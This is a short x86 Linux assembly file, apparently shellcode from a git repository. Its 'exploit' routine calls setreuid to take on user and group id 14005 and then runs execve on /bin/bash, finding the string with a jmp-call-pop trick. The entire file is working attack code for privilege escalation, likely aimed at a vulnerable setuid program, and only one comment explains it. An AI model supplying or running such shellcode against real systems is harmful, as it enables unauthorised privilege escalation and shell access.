blob: 504685f993f1ce254c0b8e7ee1b27b368e3bc326 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
global _start
_start:
jmp short data
exploit:
xor edx, edx
xor eax, eax ; set reuid
xor ebx, ebx
xor ecx, ecx
mov al, 203
mov bx, 14005
mov cx, 14005
int 0x80
xor eax, eax
xor ebx, ebx
xor ecx, ecx
pop edx
mov [edx + 10], eax
mov al, 11
mov ebx, cmd
int 0x80
data:
call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start
cmd: db '/bin/bash'
|
